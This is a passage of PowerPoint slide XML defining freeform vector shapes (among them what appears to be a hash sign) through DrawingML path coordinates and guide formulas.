                  <a:gd name="T14" fmla="*/ 112 w 188"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 188"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 188"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 188"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 49 w 188"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 188"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 43 w 188"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 188"/>
                  <a:gd name="T31" fmla="*/ 136 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 188"/>
                  <a:gd name="T33" fmla="*/ 136 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 188"/>
                  <a:gd name="T35" fmla="*/ 86 h 220"/>
                  <a:gd name="T36" fmla="*/ 10 w 188"/>
                  <a:gd name="T37" fmla="*/ 86 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 188"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 60 w 188"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 188"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 188"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 188"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 188 w 188"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 188"/>
                  <a:gd name="T59" fmla="*/ 86 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 86 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 136 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 188"/>
                  <a:gd name="T65" fmla="*/ 136 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 188"/>
                  <a:gd name="T67" fmla="*/ 8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20">
                    <a:moveTo>
                      <a:pt x="188" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6159"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Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6357"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Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6506" y="2198"/>
                <a:ext cx="154"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Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6701"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Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6898"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Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7045"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Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7244" y="219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Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7392"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2" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7589"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Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7739"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Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3986" y="2190"/>
                <a:ext cx="219" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 208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1 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 63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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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6"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="188"/>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200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53"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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="6" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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0" y="23"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="150"/>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8"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="191"/>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1"/>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0"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="71"/>
                      <a:pt x="90" y="74"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="141"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="129"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>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69"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="181"/>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3" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113"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5" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>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2" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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7"/>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7" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="40"/>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6" y="33"/>
                      <a:pt x="65" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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0" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78"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1" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>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Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="224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Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="2249"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 3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1"/>
                      <a:pt x="3"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Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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4"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Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="2929"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100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Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="2933"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
